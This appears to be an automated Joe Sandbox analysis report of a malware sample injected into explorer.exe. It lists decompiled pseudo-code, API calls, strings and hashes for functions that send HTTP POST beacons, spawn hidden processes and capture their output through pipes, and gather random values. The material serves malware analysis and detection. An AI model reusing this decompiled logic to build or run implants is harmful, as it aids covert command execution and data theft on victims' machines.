                            • Source File: 0000000E.00000002.875258870.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$ErrorLastModuleTime$AttributesByteCharCreateDebugHandleHeapMultiNameOutputStringSystemUnothrow_t@std@@@Wide__ehfuncinfo$??2@memset
                            • String ID: Hello qqq
                            • API String ID: 1203100507-3610097158
                            • Opcode ID: 8b96a12faa54738855b03958d39a9c9ad27c69214fa689d017f1ccf1e08c0267
                            • Instruction ID: 5d8fc15084eb67a1e967e79224f0c4bd4c543ae9b3caa409572413b5ae1d139a
                            • Opcode Fuzzy Hash: 8b96a12faa54738855b03958d39a9c9ad27c69214fa689d017f1ccf1e08c0267
                            • Instruction Fuzzy Hash: AD31A771900544ABEB64BF30DC49EAF37B8FB81720F10852AF495C6292DF389A49DF21
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 83%
                            			E0008E668(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20, intOrPtr _a24) {
                            				char _v8;
                            				char _v12;
                            				signed int _v16;
                            				signed int _v20;
                            				char _v24;
                            				intOrPtr _v28;
                            				char _v32;
                            				intOrPtr _v36;
                            				signed int _v40;
                            				signed int _v44;
                            				intOrPtr _v48;
                            				intOrPtr _v52;
                            				intOrPtr _v56;
                            				intOrPtr _v60;
                            				char _v64;
                            				int _v76;
                            				void* _v80;
                            				intOrPtr _v100;
                            				int _v104;
                            				void* _v108;
                            				intOrPtr _v112;
                            				intOrPtr _v116;
                            				char* _v120;
                            				void _v124;
                            				char _v140;
                            				void _v396;
                            				void _v652;
                            				intOrPtr _t105;
                            				intOrPtr _t113;
                            				intOrPtr* _t115;
                            				intOrPtr _t118;
                            				intOrPtr _t121;
                            				intOrPtr _t124;
                            				intOrPtr _t127;
                            				intOrPtr _t131;
                            				char _t133;
                            				intOrPtr _t136;
                            				char _t138;
                            				char _t139;
                            				intOrPtr _t141;
                            				intOrPtr _t147;
                            				intOrPtr _t154;
                            				intOrPtr _t158;
                            				intOrPtr _t162;
                            				intOrPtr _t164;
                            				intOrPtr _t166;
                            				intOrPtr _t172;
                            				intOrPtr _t176;
                            				void* _t183;
                            				void* _t185;
                            				intOrPtr _t186;
                            				char _t195;
                            				intOrPtr _t203;
                            				intOrPtr _t204;
                            				signed int _t209;
                            				void _t212;
                            				intOrPtr _t213;
                            				void* _t214;
                            				intOrPtr _t216;
                            				char _t217;
                            				intOrPtr _t218;
                            				signed int _t219;
                            				signed int _t220;
                            				void* _t221;
                            
                            				_v40 = _v40 & 0x00000000;
                            				_v24 = 4;
                            				_v36 = 1;
                            				_t214 = __edx;
                            				memset( &_v396, 0, 0x100);
                            				memset( &_v652, 0, 0x100);
                            				_v64 = E000895C7(0x85b);
                            				_v60 = E000895C7(0xdc9);
                            				_v56 = E000895C7(0x65d);
                            				_v52 = E000895C7(0xdd3);
                            				_t105 = E000895C7(0xb74);
                            				_v44 = _v44 & 0;
                            				_t212 = 0x3c;
                            				_v48 = _t105;
                            				memset( &_v124, 0, 0x100);
                            				_v116 = 0x10;
                            				_v120 =  &_v140;
                            				_v124 = _t212;
                            				_v108 =  &_v396;
                            				_v104 = 0x100;
                            				_v80 =  &_v652;
                            				_push( &_v124);
                            				_push(0);
                            				_v76 = 0x100;
                            				_push(E0008C379(_t214));
                            				_t113 =  *0x9e6a4; // 0xc2fe58
                            				_push(_t214);
                            				if( *((intOrPtr*)(_t113 + 0x28))() != 0) {
                            					_t209 = 0;
                            					_v20 = 0;
                            					do {
                            						_t115 =  *0x9e6a4; // 0xc2fe58
                            						_v12 = 0x8404f700;
                            						_t213 =  *_t115( *0x9e788,  *((intOrPtr*)(_t221 + _t209 * 4 - 0x24)), 0, 0, 0);
                            						if(_t213 != 0) {
                            							_t195 = 3;
                            							_t185 = 4;
                            							_v8 = _t195;
                            							_t118 =  *0x9e6a4; // 0xc2fe58
                            							 *((intOrPtr*)(_t118 + 0x14))(_t213, _t195,  &_v8, _t185);
                            							_v8 = 0x3a98;
                            							_t121 =  *0x9e6a4; // 0xc2fe58
                            							 *((intOrPtr*)(_t121 + 0x14))(_t213, 2,  &_v8, _t185);
                            							_v8 = 0x493e0;
                            							_t124 =  *0x9e6a4; // 0xc2fe58
                            							 *((intOrPtr*)(_t124 + 0x14))(_t213, 6,  &_v8, _t185);
                            							_v8 = 0x493e0;
                            							_t127 =  *0x9e6a4; // 0xc2fe58
                            							 *((intOrPtr*)(_t127 + 0x14))(_t213, 5,  &_v8, _t185);
                            							_t131 =  *0x9e6a4; // 0xc2fe58
                            							_t186 =  *((intOrPtr*)(_t131 + 0x1c))(_t213,  &_v396, _v100, 0, 0, 3, 0, 0);
                            							if(_a24 != 0) {
                            								E0008980C(_a24);
                            							}
                            							if(_t186 != 0) {
                            								_t133 = 0x8484f700;
                            								if(_v112 != 4) {
                            									_t133 = _v12;
                            								}
                            								_t136 =  *0x9e6a4; // 0xc2fe58
                            								_t216 =  *((intOrPtr*)(_t136 + 0x20))(_t186, "POST",  &_v652, 0, 0,  &_v64, _t133, 0);
                            								_v8 = _t216;
                            								if(_a24 != 0) {
                            									E0008980C(_a24);
                            								}
                            								if(_t216 != 0) {
                            									_t138 = 4;
                            									if(_v112 != _t138) {
                            										L19:
                            										_t139 = E000895C7(0x777);
                            										_t217 = _t139;
                            										_v12 = _t217;
                            										_t141 =  *0x9e6a4; // 0xc2fe58
                            										_t218 = _v8;
                            										_v28 =  *((intOrPtr*)(_t141 + 0x24))(_t218, _t217, E0008C379(_t217), _a4, _a8);
                            										E000885C2( &_v12);
                            										if(_a24 != 0) {
                            											E0008980C(_a24);
                            										}
                            										if(_v28 != 0) {
                            											L28:
                            											_v24 = 8;
                            											_push(0);
                            											_v32 = 0;
                            											_v28 = 0;
                            											_push( &_v24);
                            											_push( &_v32);
                            											_t147 =  *0x9e6a4; // 0xc2fe58
                            											_push(0x13);
                            											_push(_t218);
                            											if( *((intOrPtr*)(_t147 + 0xc))() != 0) {
                            												_t219 = E00089749( &_v32);
                            												if(_t219 == 0xc8) {
                            													 *_a20 = _v8;
                            													 *_a12 = _t213;
                            													 *_a16 = _t186;
                            													return 0;
                            												}
                            												_t220 =  ~_t219;
                            												L32:
                            												_t154 =  *0x9e6a4; // 0xc2fe58
                            												 *((intOrPtr*)(_t154 + 8))(_v8);
                            												L33:
                            												if(_t186 != 0) {
                            													_t158 =  *0x9e6a4; // 0xc2fe58
                            													 *((intOrPtr*)(_t158 + 8))(_t186);
                            												}
                            												if(_t213 != 0) {
                            													_t203 =  *0x9e6a4; // 0xc2fe58
                            													 *((intOrPtr*)(_t203 + 8))(_t213);
                            												}
                            												return _t220;
                            											}
                            											GetLastError();
                            											_t220 = 0xfffffff8;
                            											goto L32;
                            										} else {
                            											GetLastError();
                            											_t162 =  *0x9e6a4; // 0xc2fe58
                            											 *((intOrPtr*)(_t162 + 8))(_t218);
                            											_t218 = 0;
                            											goto L23;
                            										}
                            									}
                            									_v12 = _t138;
                            									_push( &_v12);
                            									_push( &_v16);
                            									_t172 =  *0x9e6a4; // 0xc2fe58
                            									_push(0x1f);
                            									_push(_t216);
                            									if( *((intOrPtr*)(_t172 + 0x18))() == 0) {
                            										L18:
                            										GetLastError();
                            										goto L19;
                            									}
                            									_v16 = _v16 | 0x00003380;
                            									_push(4);
                            									_push( &_v16);
                            									_t176 =  *0x9e6a4; // 0xc2fe58
                            									_push(0x1f);
                            									_push(_t216);
                            									if( *((intOrPtr*)(_t176 + 0x14))() != 0) {
                            										goto L19;
                            									}
                            									goto L18;
                            								} else {
                            									GetLastError();
                            									L23:
                            									_t164 =  *0x9e6a4; // 0xc2fe58
                            									 *((intOrPtr*)(_t164 + 8))(_t186);
                            									_t186 = 0;
                            									goto L24;
                            								}
                            							} else {
                            								GetLastError();
                            								L24:
                            								_t166 =  *0x9e6a4; // 0xc2fe58
                            								 *((intOrPtr*)(_t166 + 8))(_t213);
                            								_t213 = 0;
                            								goto L25;
                            							}
                            						}
                            						GetLastError();
                            						L25:
                            						_t204 = _t218;
                            						_t209 = _v20 + 1;
                            						_v20 = _t209;
                            					} while (_t209 < 2);
                            					_v8 = _t218;
                            					if(_t204 != 0) {
                            						goto L28;
                            					}
                            					_t220 = 0xfffffffe;
                            					goto L33;
                            				}
                            				_t183 = 0xfffffffc;
                            				return _t183;
                            			}


                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000E.00000002.875258870.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: memset$ErrorLast
                            • String ID: POST
                            • API String ID: 2570506013-1814004025
                            • Opcode ID: 367a7a72f7db2160077767910a4473ccd00a1e93e961edb2d3cd1ed941d500fc
                            • Instruction ID: ea6434b96816f391ca67125378d8c048189af0a816e14d9e93347baa296bf716
                            • Opcode Fuzzy Hash: 367a7a72f7db2160077767910a4473ccd00a1e93e961edb2d3cd1ed941d500fc
                            • Instruction Fuzzy Hash: 50B13C71900208AFEB55EFA4DC89EAE7BB8FF58310F10406AF545EB291DB749E44CB61
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 28%
                            			E000916B8(signed int* _a4) {
                            				char _v8;
                            				_Unknown_base(*)()* _v12;
                            				_Unknown_base(*)()* _v16;
                            				char _v20;
                            				_Unknown_base(*)()* _t16;
                            				_Unknown_base(*)()* _t17;
                            				void* _t22;
                            				intOrPtr* _t28;
                            				signed int _t29;
                            				signed int _t30;
                            				struct HINSTANCE__* _t32;
                            				void* _t34;
                            
                            				_t30 = 0;
                            				_v8 = 0;
                            				_t32 = GetModuleHandleA("advapi32.dll");
                            				if(_t32 == 0) {
                            					L9:
                            					return 1;
                            				}
                            				_t16 = GetProcAddress(_t32, "CryptAcquireContextA");
                            				_v12 = _t16;
                            				if(_t16 == 0) {
                            					goto L9;
                            				}
                            				_t17 = GetProcAddress(_t32, "CryptGenRandom");
                            				_v16 = _t17;
                            				if(_t17 == 0) {
                            					goto L9;
                            				}
                            				_t28 = GetProcAddress(_t32, "CryptReleaseContext");
                            				if(_t28 == 0) {
                            					goto L9;
                            				}
                            				_push(0xf0000000);
                            				_push(1);
                            				_push(0);
                            				_push(0);
                            				_push( &_v8);
                            				if(_v12() == 0) {
                            					goto L9;
                            				}
                            				_t22 = _v16(_v8, 4,  &_v20);
                            				 *_t28(_v8, 0);
                            				if(_t22 == 0) {
                            					goto L9;
                            				}
                            				_t29 = 0;
                            				do {
                            					_t30 = _t30 << 0x00000008 |  *(_t34 + _t29 - 0x10) & 0x000000ff;
                            					_t29 = _t29 + 1;
                            				} while (_t29 < 4);
                            				 *_a4 = _t30;
                            				return 0;
                            			}


                            APIs
                            • GetModuleHandleA.KERNEL32(advapi32.dll,00000000,00000000,00000000,0008765A,?,?,00000000,?), ref: 000916CB
                            • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA,?,?,00000000,?), ref: 000916E3
                            • GetProcAddress.KERNEL32(00000000,CryptGenRandom,?,?,00000000,?), ref: 000916F2
                            • GetProcAddress.KERNEL32(00000000,CryptReleaseContext,?,?,00000000,?), ref: 00091701
                            Strings
                            Memory Dump Source
                            • Source File: 0000000E.00000002.875258870.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$HandleModule
                            • String ID: CryptAcquireContextA$CryptGenRandom$CryptReleaseContext$advapi32.dll
                            • API String ID: 667068680-129414566
                            • Opcode ID: 27f9b75c89bbff0010089760dc2ea391a5fe869bbdee21b5a79a33e181e9a0cc
                            • Instruction ID: f7ee788a374f61118607f953ef7ffa495e5dc05b0280f9c56cf14542586de261
                            • Opcode Fuzzy Hash: 27f9b75c89bbff0010089760dc2ea391a5fe869bbdee21b5a79a33e181e9a0cc
                            • Instruction Fuzzy Hash: B5117731B046177BDF515BEA8C84EEFBBF9AF46780B044065FA15F6240DA70D901A764
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 87%
                            			E00092122(char* _a4, intOrPtr _a8, long long _a12, signed int _a20) {
                            				signed int _t12;
                            				signed int _t13;
                            				int _t15;
                            				char* _t24;
                            				char* _t26;
                            				char* _t28;
                            				char* _t29;
                            				signed int _t40;
                            				char* _t43;
                            				char* _t45;
                            				long long* _t47;
                            
                            				_t12 = _a20;
                            				if(_t12 == 0) {
                            					_t12 = 0x11;
                            				}
                            				_t26 = _a4;
                            				_push(_t30);
                            				 *_t47 = _a12;
                            				_push(_t12);
                            				_push("%.*g");
                            				_push(_a8);
                            				_push(_t26);
                            				L00092285();
                            				_t40 = _t12;
                            				if(_t40 < 0 || _t40 >= _a8) {
                            					L19:
                            					_t13 = _t12 | 0xffffffff;
                            					goto L20;
                            				} else {
                            					L000922CD();
                            					_t15 =  *((intOrPtr*)( *_t12));
                            					if(_t15 != 0x2e) {
                            						_t24 = strchr(_t26, _t15);
                            						if(_t24 != 0) {
                            							 *_t24 = 0x2e;
                            						}
                            					}
                            					if(strchr(_t26, 0x2e) != 0 || strchr(_t26, 0x65) != 0) {
                            						L11:
                            						_t43 = strchr(_t26, 0x65);
                            						_t28 = _t43;
                            						if(_t43 == 0) {
                            							L18:
                            							_t13 = _t40;
                            							L20:
                            							return _t13;
                            						}
                            						_t45 = _t43 + 1;
                            						_t29 = _t28 + 2;
                            						if( *_t45 == 0x2d) {
                            							_t45 = _t29;
                            						}
                            						while( *_t29 == 0x30) {
                            							_t29 = _t29 + 1;
                            						}
                            						if(_t29 != _t45) {
                            							E00088706(_t45, _t29, _t40 - _t29 + _a4);
                            							_t40 = _t40 + _t45 - _t29;
                            						}
                            						goto L18;
                            					} else {
                            						_t6 = _t40 + 3; // 0x909b2
                            						_t12 = _t6;
                            						if(_t12 >= _a8) {
                            							goto L19;
                            						}
                            						_t26[_t40] = 0x302e;
                            						( &(_t26[2]))[_t40] = 0;
                            						_t40 = _t40 + 2;
                            						goto L11;
                            					}
                            				}
                            			}















                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000E.00000002.875258870.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: strchr$_snprintflocaleconv
                            • String ID: %.*g
                            • API String ID: 1910550357-952554281
                            • Opcode ID: ce2afa961fa85e74440034e363737a64cfa4b0764273ec5c58c06da3881b6a43
                            • Instruction ID: 1807b53470dfa9210b137be6f10a1510799a81b613ee7934cd0fe15d2e85ebbb
                            • Opcode Fuzzy Hash: ce2afa961fa85e74440034e363737a64cfa4b0764273ec5c58c06da3881b6a43
                            • Instruction Fuzzy Hash: 8E216A766047427ADF259A28DCC6BEA3BDCDF25330F150155FE509A182EA74EC60B3A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000E.00000002.875258870.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: _snprintfqsort
                            • String ID: %I64d$false$null$true
                            • API String ID: 756996078-4285102228
                            • Opcode ID: c3656f1e48f6528892983799641ac3336606c700c83bb0b62e38ba968db40f99
                            • Instruction ID: e8f87335b98eb15e4b72e6aadc3c6444a94586e470a32963d335527edd021b66
                            • Opcode Fuzzy Hash: c3656f1e48f6528892983799641ac3336606c700c83bb0b62e38ba968db40f99
                            • Instruction Fuzzy Hash: F1E17DB190020ABFDF119F64CC46EEF3BA9EF55384F108019FE1596152EB31DA61EBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • SysAllocString.OLEAUT32(00000000), ref: 0008D75C
                            • SysAllocString.OLEAUT32(?), ref: 0008D764
                            • SysAllocString.OLEAUT32(00000000), ref: 0008D778
                            • SysFreeString.OLEAUT32(?), ref: 0008D7F3
                            • SysFreeString.OLEAUT32(?), ref: 0008D7F6
                            • SysFreeString.OLEAUT32(?), ref: 0008D7FB
                            Memory Dump Source
                            • Source File: 0000000E.00000002.875258870.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: String$AllocFree
                            • String ID:
                            • API String ID: 344208780-0
                            • Opcode ID: 0ae35b3864b79a2002ceb2acc07a6214e28e9f75c0e65d5a7fc5e6ecf6b65d72
                            • Instruction ID: a89b29efd16a02d44f6d8e25ac1661f5a2b1d21aaf5940480051179919990030
                            • Opcode Fuzzy Hash: 0ae35b3864b79a2002ceb2acc07a6214e28e9f75c0e65d5a7fc5e6ecf6b65d72
                            • Instruction Fuzzy Hash: 1821F975900218AFDB10EFA5CC88DAFBBBDFF48654B10449AF505E7250DA71AE01CB60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 0000000E.00000002.875258870.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: @$\u%04X$\u%04X\u%04X
                            • API String ID: 0-2132903582
                            • Opcode ID: ad3677773898463b826370865ef61fb4a1262acb6dcbc071cab37c5794fd638b
                            • Instruction ID: fcde36fe93850f7dd9ad1ae31ae76e92f94782fe824cdb2d7e9ac6baa3171ba9
                            • Opcode Fuzzy Hash: ad3677773898463b826370865ef61fb4a1262acb6dcbc071cab37c5794fd638b
                            • Instruction Fuzzy Hash: C6411931700205EFEF784A9CCD9ABBF2AA8DF45340F244125F986D6396DA61CD91B3D1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 30%
                            			E0008D523(void* __ecx) {
                            				char _v8;
                            				void* _v12;
                            				char* _t15;
                            				intOrPtr* _t16;
                            				void* _t21;
                            				intOrPtr* _t23;
                            				intOrPtr* _t24;
                            				intOrPtr* _t25;
                            				void* _t30;
                            				void* _t33;
                            
                            				_v12 = 0;
                            				_v8 = 0;
                            				__imp__CoInitializeEx(0, 0, _t30, _t33, __ecx, __ecx);
                            				__imp__CoInitializeSecurity(0, 0xffffffff, 0, 0, 0, 3, 0, 0, 0);
                            				_t15 =  &_v12;
                            				__imp__CoCreateInstance(0x9b848, 0, 1, 0x9b858, _t15);
                            				if(_t15 < 0) {
                            					L5:
                            					_t23 = _v8;
                            					if(_t23 != 0) {
                            						 *((intOrPtr*)( *_t23 + 8))(_t23);
                            					}
                            					_t24 = _v12;
                            					if(_t24 != 0) {
                            						 *((intOrPtr*)( *_t24 + 8))(_t24);
                            					}
                            					_t16 = 0;
                            				} else {
                            					__imp__#2(__ecx);
                            					_t25 = _v12;
                            					_t21 =  *((intOrPtr*)( *_t25 + 0xc))(_t25, _t15, 0, 0, 0, 0, 0, 0,  &_v8);
                            					if(_t21 < 0) {
                            						goto L5;
                            					} else {
                            						__imp__CoSetProxyBlanket(_v8, 0xa, 0, 0, 3, 3, 0, 0);
                            						if(_t21 < 0) {
                            							goto L5;
                            						} else {
                            							_t16 = E00088604(8);
                            							if(_t16 == 0) {
                            								goto L5;
                            							} else {
                            								 *((intOrPtr*)(_t16 + 4)) = _v12;
                            								 *_t16 = _v8;
                            							}
                            						}
                            					}
                            				}
                            				return _t16;
                            			}














                            APIs
                            • CoInitializeEx.OLE32(00000000,00000000), ref: 0008D536
                            • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0008D547
                            • CoCreateInstance.OLE32(0009B848,00000000,00000001,0009B858,?), ref: 0008D55E
                            • SysAllocString.OLEAUT32(00000000), ref: 0008D569
                            • CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0008D594
                              • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
                            Memory Dump Source
                            • Source File: 0000000E.00000002.875258870.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: Initialize$AllocAllocateBlanketCreateHeapInstanceProxySecurityString
                            • String ID:
                            • API String ID: 1610782348-0
                            • Opcode ID: 61e718e46d9626c6fc607ac76e9c554d5449760960f597cd4dce1a0c96a4aa07
                            • Instruction ID: 5ca9e363416111ca0ccf9453dcb24a0453d396344b9ddfdbf921160754929c58
                            • Opcode Fuzzy Hash: 61e718e46d9626c6fc607ac76e9c554d5449760960f597cd4dce1a0c96a4aa07
                            • Instruction Fuzzy Hash: 6F21E970600245BBEB249B66DC4DE6FBFBCFFC6B25F10415EB541A62A0DA709A01CB30
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 79%
                            			E000921FF(char* __eax, char** _a4, long long* _a8) {
                            				char* _v8;
                            				long long _v16;
                            				char* _t9;
                            				signed char _t11;
                            				char** _t19;
                            				char _t22;
                            				long long _t32;
                            				long long _t33;
                            
                            				_t9 = __eax;
                            				L000922CD();
                            				_t19 = _a4;
                            				_t22 =  *__eax;
                            				if( *_t22 != 0x2e) {
                            					_t9 = strchr( *_t19, 0x2e);
                            					if(_t9 != 0) {
                            						 *_t9 =  *_t22;
                            					}
                            				}
                            				L00092291();
                            				 *_t9 =  *_t9 & 0x00000000;
                            				_t11 = strtod( *_t19,  &_v8);
                            				asm("fst qword [ebp-0xc]");
                            				_t32 =  *0x98250;
                            				asm("fucomp st1");
                            				asm("fnstsw ax");
                            				if((_t11 & 0x00000044) != 0) {
                            					L5:
                            					st0 = _t32;
                            					L00092291();
                            					if( *_t11 != 0x22) {
                            						_t33 = _v16;
                            						goto L8;
                            					} else {
                            						return _t11 | 0xffffffff;
                            					}
                            				} else {
                            					_t33 =  *0x98258;
                            					asm("fucomp st1");
                            					asm("fnstsw ax");
                            					if((_t11 & 0x00000044) != 0) {
                            						L8:
                            						 *_a8 = _t33;
                            						return 0;
                            					} else {
                            						goto L5;
                            					}
                            				}
                            			}












                            APIs
                            Memory Dump Source
                            • Source File: 0000000E.00000002.875258870.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: _errno$localeconvstrchrstrtod
                            • String ID:
                            • API String ID: 1035490122-0
                            • Opcode ID: de4c433de47fb25370494944294a547a5aa963e4291e7017832a2afbf295a471
                            • Instruction ID: 9be57ecffa989f7d2828815fae2d17a9d7f4e019258d81125002a8d3572c8328
                            • Opcode Fuzzy Hash: de4c433de47fb25370494944294a547a5aa963e4291e7017832a2afbf295a471
                            • Instruction Fuzzy Hash: 7701F239904205FADF127F24E9057DD7BA8AF4B360F2041D1E9D0A61E2DB759854E7A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 73%
                            			E0008A9B7(signed int __ecx) {
                            				void* _v8;
                            				void* _v12;
                            				void* _v16;
                            				void* _v20;
                            				signed int _v24;
                            				char _v28;
                            				char _v32;
                            				char _v36;
                            				struct _SECURITY_ATTRIBUTES _v48;
                            				intOrPtr _v60;
                            				char _v64;
                            				intOrPtr _v76;
                            				intOrPtr _v80;
                            				void* _v84;
                            				short _v92;
                            				intOrPtr _v96;
                            				void _v140;
                            				intOrPtr _t77;
                            				void* _t79;
                            				intOrPtr _t85;
                            				intOrPtr _t87;
                            				intOrPtr _t89;
                            				intOrPtr _t92;
                            				intOrPtr _t98;
                            				intOrPtr _t100;
                            				intOrPtr _t102;
                            				long _t111;
                            				intOrPtr _t115;
                            				intOrPtr _t126;
                            				void* _t127;
                            				void* _t128;
                            				void* _t129;
                            				void* _t130;
                            
                            				_t111 = 0;
                            				_v24 = __ecx;
                            				_v12 = 0;
                            				_v20 = 0;
                            				_t127 = 0;
                            				_v8 = 0;
                            				_v16 = 0;
                            				_v48.nLength = 0xc;
                            				_v48.lpSecurityDescriptor = 0;
                            				_v48.bInheritHandle = 1;
                            				_v28 = 0;
                            				memset( &_v140, 0, 0x44);
                            				asm("stosd");
                            				_t130 = _t129 + 0xc;
                            				asm("stosd");
                            				asm("stosd");
                            				asm("stosd");
                            				if(CreatePipe( &_v12,  &_v20,  &_v48, 0) == 0) {
                            					L18:
                            					return 0;
                            				}
                            				if(CreatePipe( &_v8,  &_v16,  &_v48, 0) == 0) {
                            					L13:
                            					E0008861A( &_v28, 0);
                            					if(_v20 != 0) {
                            						_t77 =  *0x9e684; // 0xc2f8f0
                            						 *((intOrPtr*)(_t77 + 0x30))(_v20);
                            					}
                            					if(_v8 != 0) {
                            						_t115 =  *0x9e684; // 0xc2f8f0
                            						 *((intOrPtr*)(_t115 + 0x30))(_v8);
                            					}
                            					return _t111;
                            				}
                            				_t79 = _v16;
                            				_v76 = _t79;
                            				_v80 = _t79;
                            				_v84 = _v12;
                            				_v140 = 0x44;
                            				_v96 = 0x101;
                            				_v92 = 0;
                            				_t126 = E00088604(0x1001);
                            				_v28 = _t126;
                            				if(_t126 == 0) {
                            					goto L18;
                            				}
                            				_push( &_v64);
                            				_push( &_v140);
                            				_t85 =  *0x9e684; // 0xc2f8f0
                            				_push(0);
                            				_push(0);
                            				_push(0x8000000);
                            				_push(1);
                            				_push(0);
                            				_push(0);
                            				_push(_v24);
                            				_push(0);
                            				if( *((intOrPtr*)(_t85 + 0x38))() == 0) {
                            					goto L13;
                            				}
                            				_t87 =  *0x9e684; // 0xc2f8f0
                            				 *((intOrPtr*)(_t87 + 0x30))(_v12);
                            				_t89 =  *0x9e684; // 0xc2f8f0
                            				 *((intOrPtr*)(_t89 + 0x30))(_v16);
                            				_v24 = _v24 & 0;
                            				do {
                            					_t92 =  *0x9e684; // 0xc2f8f0
                            					_v36 =  *((intOrPtr*)(_t92 + 0x88))(_v8, _t126, 0x1000,  &_v24, 0);
                            					 *((char*)(_v24 + _t126)) = 0;
                            					if(_t111 == 0) {
                            						_t127 = E000891A6(_t126, 0);
                            					} else {
                            						_push(0);
                            						_push(_t126);
                            						_v32 = _t127;
                            						_t127 = E00089292(_t127);
                            						E0008861A( &_v32, 0xffffffff);
                            						_t130 = _t130 + 0x14;
                            					}
                            					_t111 = _t127;
                            					_v32 = _t127;
                            				} while (_v36 != 0);
                            				_push( &_v36);
                            				_push(E0008C379(_t127));
                            				_t98 =  *0x9e68c; // 0xc2fab8
                            				_push(_t127);
                            				if( *((intOrPtr*)(_t98 + 0xb8))() != 0) {
                            					L12:
                            					_t100 =  *0x9e684; // 0xc2f8f0
                            					 *((intOrPtr*)(_t100 + 0x30))(_v64);
                            					_t102 =  *0x9e684; // 0xc2f8f0
                            					 *((intOrPtr*)(_t102 + 0x30))(_v60);
                            					goto L13;
                            				}
                            				_t128 = E00089256(_t127);
                            				if(_t128 == 0) {
                            					goto L12;
                            				}
                            				E0008861A( &_v32, 0);
                            				return _t128;
                            			}





































                            APIs
                            • memset.MSVCRT ref: 0008A9F4
                            • CreatePipe.KERNEL32(?,?,0000000C,00000000,00000000,00000000,00000000), ref: 0008AA18
                            • CreatePipe.KERNEL32(000865A9,?,0000000C,00000000), ref: 0008AA2F
                              • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
                              • Part of subcall function 0008861A: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 00088660
                            Strings
                            Memory Dump Source
                            • Source File: 0000000E.00000002.875258870.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateHeapPipe$AllocateFreememset
                            • String ID: D
                            • API String ID: 2365139273-2746444292
                            • Opcode ID: 67bc10a6decf753f6dac1e13afc2d66274f75466a29843fca943c411748d35ce
                            • Instruction ID: 1038731307509bc63423b83b895d9a6edc7a8df2068bd220f00375d18a9fab8d
                            • Opcode Fuzzy Hash: 67bc10a6decf753f6dac1e13afc2d66274f75466a29843fca943c411748d35ce
                            • Instruction Fuzzy Hash: 3A512C72E00209AFEB51EFA4CC45FDEBBB9BB08300F14416AF544E7152EB7499048B61
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 89%
                            			E0008C4CE(void* __ebx, void* __edx, void* __edi, void* __esi) {
                            				char _v8;
                            				char _v12;
                            				void _v140;
                            				signed char _t14;
                            				char _t15;
                            				intOrPtr _t20;
                            				void* _t25;
                            				intOrPtr _t26;
                            				intOrPtr _t32;
                            				WCHAR* _t34;
                            				intOrPtr _t35;
                            				struct HINSTANCE__* _t37;
                            				int _t38;
                            				intOrPtr _t46;
                            				void* _t47;
                            				intOrPtr _t50;
                            				void* _t60;
                            				void* _t61;
                            				char _t62;
                            				char* _t63;
                            				void* _t65;
                            				intOrPtr _t66;
                            				char _t68;
                            
                            				_t65 = __esi;
                            				_t61 = __edi;
                            				_t47 = __ebx;
                            				_t50 =  *0x9e688; // 0xb0000
